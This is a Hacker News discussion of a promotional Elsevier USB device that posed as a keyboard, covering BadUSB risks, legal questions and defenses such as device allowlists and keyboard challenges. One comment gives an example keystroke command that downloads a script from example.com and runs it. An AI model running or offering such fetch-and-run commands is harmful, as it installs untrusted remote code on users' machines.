
Elsevier, that just freaked me out - phreeza
http://swaldman.dreamwidth.org/352778.html
======
adrianN
Plugging things in your USB port has been known as a dangerous activity for
quite some time.[1,2] It's surprising that someone at Elsevier thought it
would be a good idea to use these techniques though.

[1] [https://srlabs.de/badusb](https://srlabs.de/badusb)

[2] [https://media.blackhat.com/bh-dc-11/Larimer/BlackHat_DC_2011...](https://media.blackhat.com/bh-dc-11/Larimer/BlackHat_DC_2011_Larimer_Vulnerabiliters_w-removeable_storage-wp.pdf)

~~~
mbreese
Is it _really_ all that surprising that someone from Elsevier thought it was a
good idea?

~~~
Animats
This is a known attack vector. For a major company to use it is probably
criminal, under the Computer Fraud and Abuse Act. There's no sign of an EULA
here, authorizing them access.

Elsevier knows this is an attack. They published a book titled "Seven
Deadliest USB Attacks", by Brian Anderson. So they can't claim this wasn't
done knowingly.

Has anybody found out what the attack does?

[1] [http://www.elsevier.com/books/seven-deadliest-usb-attacks/an...](http://www.elsevier.com/books/seven-deadliest-usb-attacks/anderson/978-1-59749-553-0)

~~~
klausa
"Making a thing type stuff when you plug it in" is an attack vector in the
same way "sending a request over the network" is.

~~~
tripzilch
Well it's not "just typing stuff", it's typing some rather specific stuff to
make your computer do something quite unexpected. The reasonable expectation
(for a promotional item) is that it's a memory stick, not that it suddenly
starts typing system control global keyboard shortcuts into your computer.

Say you'd post a persistent XSS to a forum, but only use it to include
Fartscroll.js, is that an attack or not? Cause I consider that to be pretty
much the same category as the "surprise" automatic typing USB thing.

This weekend actually I used a USB device where this was in fact the
_intended_ behaviour: a barcode scanner. It registers as a keyboard and just
types the numbers (or string) of whatever it scans. Very clever idea because
it makes it very easy to write apps for, you don't need a driver or anything.
Except I had momentarily forgotten that was how it works, so it surprised me
anyway. Fortunately the numbers didn't do much in the program I had focused
but still, that feeling of _something else_ unexpectedly typing on my
computer! Yeah if it had sent global keyboard shortcuts in order to make my
computer start applications and load webpages, I'd be pretty pissed.

------
jordigh
Can we have a usb condom for this situation? The actual product called "usb
condom" is about charging phones and blocking all data pins on the usb drive.
Can we have one that will only allow devices to connect as mass storage
devices, or is this at odds with the usb protocol?

~~~
gchadwick
I wonder if you actually need a hardware device for this?

Seems you could have an OS feature so when you insert a USB device it first
confirms you're happy for the device to register as an X (mass storage, input,
audio etc) before it lets it do it.

~~~
gchadwick
Though saying yes to registering your keyboard, mouse etc every time you boot
might get a little tedious (not to mention impossible if you have no other
input devices!).

Perhaps an extension to USB that has 512 bits' worth of persistent storage per
device. When you register a device, the OS produces a random number, writes
it, and saves the list of allowed IDs.

Or perhaps you could ask the OS to only apply the ask to register feature to
certain USB ports?

~~~
zxv
USB firewall.

White-list the USB keyboard when it is first attached, using its unique serial
number, and avoid a prompt in the future.

~~~
dfox
Various devices tend to either have serial number empty (for example both my
keyboard and mouse, Sun and Logitech respectively, so not exactly cheap
Chinese crap) or filled with some random garbage that is not unique at all
("123456", "Serial" and so on).

One would assume that "garbage in iSerial" is a workaround for Windows' behavior
of identifying devices by either its serial or physical port and requiring
distinct driver registrations for devices that are "different" according to
this logic.

~~~
the8472
It might still be useful to filter based on type. If you expect a mass storage
device you don't want it to register as an input device.

------
jimrandomh
This is an operating system problem. When a new device is plugged in and
claims to be a keyboard, it should lock the screen and not be accepted as
input until it has typed the user's login password.

~~~
cheepin
This instantly breaks Yubikey among other things.

~~~
freehunter
A lot of security fixes break features that would otherwise be classified as
exploits.

------
brillenfux
So will this USB firmware situation eventually be solved in some newer version
or are we all just silently ignoring this?

Because this makes USB an absolute NO in some environments (and for quite a
while now).

It would be nice if we could use USB again at some point…

~~~
throwaway7767
> So will this USB firmware situation eventually be solved in some newer
> version or are we all just silently ignoring this?

No, it will not be fixed. There is no vulnerability. We need to plug in
keyboards, and if users are willing to plug random devices into the ports
where their keyboards lie, those peripherals can inject keystrokes.

We can play whack-a-mole and blacklist the vendor/product IDs (like systemd
does), but if this were a real attack and not a stupid marketing stunt, the
device would just present itself as some popular cheap keyboard and there'd be
no way for the computer to tell it apart from one.

There are many other ways you could attack USB or other connectors if you get
a user to plug your hardware in there, most are more involved than this one.
The only solution is to educate people to not plug hardware they don't trust
into their machines.

~~~
digi_owl
That systemd thing is hilarious in its tragic misunderstanding.

Basically a patch was offered that would lock a computer if a new device was
plugged in. This was to counteract police mouse wigglers etc.

But Poettering decided that no, that was too heavy-handed; let's instead
blacklist the specific product id. Never mind that changing a product id is a
firmware flash away (one could probably make a wiggler that randomizes its id
on each insertion).

~~~
vacri
It is too heavy-handed. Locking the computer every time I plug in a controller
or some other HID?

What if the battery dies in my wireless keyboard, and I need to plug in
another one temporarily? How could I possibly type in the password at a lock
screen with one dead keyboard and all new keyboards forbidden?

~~~
Dylan16807
With your mouse.

I'm being cheeky but any good lock screen should have an onscreen keyboard
button.

And it should only need to do it the first time you plug it in.

~~~
vacri
Not all lockscreens do. Using MATE on this machine, no such button. I don't
believe the KDE 4.4 one does either. The greeter might, but not the
lockscreen.

------
jimrandomh
Distributing a USB device that pretends to be a keyboard and types commands is
somewhere between faux pas and criminal hacking attempt. Even if the intent
was innocent, it has to be investigated like a break-in to be sure. In this
case it sounds like it was closer to the faux pas side.

~~~
zdkl
What bothers me in these situations where there is (arguably) room for
interpretation over the gravity of the act is the double standards. BigCompany
does something harmless but illegal? They have the resources to make it sound
completely benign to a court. Some random person gets hauled to court over an
arguably harmless/moral grey zone matter and the story ends much differently.

~~~
1024core
I was going to say that. Reminds me of Sony's RootKit. Did any Sony exec get
prosecuted for "hacking"? Nope.

------
upofadown
I suspect that a legal approach might work here. Elsevier was being
deliberately misleading and was deliberately making a computer do something
that the owner of that computer had not authorized. There must be some
computer crime statute they could be charged under.

~~~
pbhjpbhj
On a naive reading it breaches the Computer Misuse Act in the UK and the CFAA
in the USA both of which have terms guarding against unauthorised access. You
need more wrangling to read it in to a normal interpretation of the CFAA
however.

IANAL.

------
jgrahamc
I made a thing like this for the office with an Arduino Trinket:
[https://github.com/jgrahamc/missile_command](https://github.com/jgrahamc/missile_command)

------
ColinWright
[https://news.ycombinator.com/item?id=10203010](https://news.ycombinator.com/item?id=10203010)

~~~
phreeza
Huh, how did that get past the dupe detector? It's exactly the same URL.

~~~
sctb
The dupe detector now takes into account the amount of attention previous
submissions received.

~~~
skrebbel
Might be nice if it could bump a post back to "new" when the dupe detector
finds a dupe with not-very-much-attention - that way, effectively the comments
are merged.

------
sp332
I wonder if it's hard-coded or if you could make it do something else. Hak5
has been selling programmable versions of these for a while.
[http://hakshop.myshopify.com/collections/usb-rubber-ducky/pr...](http://hakshop.myshopify.com/collections/usb-rubber-ducky/products/usb-rubber-ducky-deluxe?variant=353378649)

~~~
olympus
This is common in the pentesting world. If you can get physical access to a
USB port for just a few seconds you can enter the keystrokes to open up a port
(or reverse SSH) to the outside world. With only three different procedures
(one for Windows, Mac, and Linux) you can own 99% of the computers in the
world.

------
ozzmotik
not sure if this has been mentioned, but this sounds like the Rubber Ducky

[http://hakshop.myshopify.com/products/usb-rubber-ducky-delux...](http://hakshop.myshopify.com/products/usb-rubber-ducky-deluxe?variant=353378649)

just contributing something of interest.

~~~
samwiseg
Yeah exactly, this has been out for a while. Not sure why this is on the front
page of HN.

~~~
sprkyco
Most likely due to the fact that a publishing company was utilizing this
"hack".

------
almightysmudge
Stuns me that someone thought this would be a good idea.

Oh hey my free USB device helpfully made me go to a webpage without warning
and without permission, these guys are wizards and deserve my custom.

~~~
deong
Well, it's Elsevier. The fact that it only _potentially_ exploited your system
and didn't attempt to grab your banking password might actually be taken as a
legitimate sign of improvement.

------
px43
Ancient. The latest fun project enabling this sort of thing is Samy's
USBDriveby project:

[https://www.youtube.com/watch?v=aSLEq7-hlmo](https://www.youtube.com/watch?v=aSLEq7-hlmo)

And yes, you totally can detect operating system, bypass HID protections, and
deliver custom weaponized payloads in the form of scripts catted into the
command prompt.

------
Someone
Anybody know whether [https://www.gdatasoftware.com/en-usb-keyboard-guard](https://www.gdatasoftware.com/en-usb-keyboard-guard) works well and can be trusted?

------
j_s
What is the url?

Seems like a juicy target for a hack on the server side.

------
kazagistar
My employer blocks USB memory sticks... but still permits keyboards and mice
for convenience. I am not sure what they hope to accomplish.

~~~
px43
They hope to prevent people from putting sensitive documents on unencrypted
media that's easy to lose.

There have been worms that spread through autorun and shell exploits, but I
think that's a secondary concern.

~~~
kazagistar
... except I don't have access to sensitive information (because we have a
decent separation between programmers and ops related to PII), and I do have
full access to the entire internet, which is a great alternate insecure
transfer medium.

------
hnk
A friend of mine works at a university in Germany and one of his last
projects was exactly this.

They were to build a device using a Teensy that starts up a webpage once
plugged in. It needed to work on major OSes and *nix systems. Win7/8/10, OSX,
Ubuntu.

This was for some conference as well where they were to be used...

------
moyix
Apparently some of these are reprogrammable by just rewriting the onboard I2C
EEPROM:

[http://blog.opensecurityresearch.com/2012/10/hacking-usb-web...](http://blog.opensecurityresearch.com/2012/10/hacking-usb-webkeys.html)

Could be a fun weekend project.

------
SomeoneWeird
There's an off-the-shelf USB that you can buy called a Teensy[1] that is
programmable and automatically registers itself as a USB HID. Very similar to
what is described here.

[1] [https://www.pjrc.com/teensy/](https://www.pjrc.com/teensy/)

------
jonknee
And that's a feature, not a bug. I have a YubiKey and it does a similar thing,
but for good not evil. It would be tricky for an OS to not register keyboards
(after all, how would you vouch for an input device without using an input
device?).

tl;dr don't plug unknown things into your computer.

~~~
masklinn
> after all, how would you vouch for an input device without using an input
> device?

Separate built-in device, or a specific signal sequence inputtable on the IME
the device registered itself as. E.g. if you plug in something which advertises
itself as a keyboard, the system sandboxes it and asks that you input a
specific password which it displays; for a pointing device it might ask you to
move the pointer to specific places and click on them.

~~~
zyxley
I like this. It feels pretty similar to the "enter this random set of numbers"
method for some Bluetooth keyboard pairings.
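The sandbox-and-challenge scheme masklinn describes, which zyxley compares to Bluetooth pairing, sketched as an added Python example (written for this page; not code from the thread or from any real OS): keystrokes from a newly attached keyboard are held back until the device types the code shown on screen, and whatever it typed before verifying is dropped rather than replayed. The challenge length, the stray-key limit and the state names are assumptions.

```python
import secrets
import string

CHALLENGE_LEN = 6       # assumed: digits shown on screen for the user to type
MAX_STRAY_KEYS = 32     # assumed: give up on a device that types without answering

class QuarantinedKeyboard:
    """A newly attached keyboard whose input is held until it proves a human
    is behind it by typing the code the screen displays."""

    def __init__(self, rng=secrets):
        # The challenge exists only on screen; a device replaying a canned
        # script cannot know it, so its keystrokes never reach applications.
        self.challenge = "".join(rng.choice(string.digits)
                                 for _ in range(CHALLENGE_LEN))
        self.window = []        # last CHALLENGE_LEN keys seen, for matching
        self.held = []          # keystrokes swallowed while in quarantine
        self.state = "quarantined"

    def on_key(self, key: str) -> bool:
        """Feed one keystroke. Returns True only if it is delivered to apps."""
        if self.state == "trusted":
            return True
        if self.state == "blocked":
            return False
        self.held.append(key)
        self.window = (self.window + [key])[-CHALLENGE_LEN:]
        if self.window == list(self.challenge):
            self.state = "trusted"
            # Nothing typed before verification is replayed: any shortcuts a
            # hostile device front-loaded are discarded along with the code.
            self.held.clear()
        elif len(self.held) >= MAX_STRAY_KEYS:
            self.state = "blocked"
        return False    # the challenge keys themselves are consumed

if __name__ == "__main__":
    kb = QuarantinedKeyboard()
    print("type this code:", kb.challenge)
    for ch in kb.challenge:          # stand-in for the user typing it
        kb.on_key(ch)
    print(kb.state, kb.on_key("a"))  # trusted True
```

The verification only has to happen the first time a unit is seen; the admission policy that remembers it is a separate matter (see the allowlist discussion higher up the thread).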

------
ggchappell
I don't worry much about inserting wacky storage devices, as I run Linux, and
I don't have any kind of auto-run enabled.

But this would still work on my machine, right? (I mean that the key combo
would be entered; it might not actually bring up the web page, depending on my
setup.)

~~~
phaemon
Yes, and worse it could do something like:

ALT+F2 wget [http://example.com/badscript.sh](http://example.com/badscript.sh)
&& chmod 755 ~/badscript.sh && ~/badscript.sh &

Which is not so good...

~~~
jessaustin
Oh it would _suck_ to have to put a shorter timeout on _sudo_.

------
robryk
I wonder if it is possible to fingerprint USB keyboards of same make (with
same dummy serial number) to tell them apart. For example one could try to
exploit frequency deviations of the crystal oscillator in the keyboard.

------
rblatz
Hyundai did this years ago in 2011 when I bought my car. They sent me a USB
key that emulated a keyboard. It opened up the Hyundai registration page, and
may have typed my VIN in for me. This isn't new at all.

------
s_kilk
A few years back a colleague (at the time) went to a MongoDB event where they
pulled this same stunt, handing out usb drives that would act like a keyboard
and hijack the machine.

Both clever and reprehensible.

------
javajosh
It's not an attack unless you write to the hard-drive. This is more of a
nuisance, and a bad move, and troubling for what it _could_ be, but the thing
itself looks harmless.

------
conceit
Is this done to boost the called site's search rank?

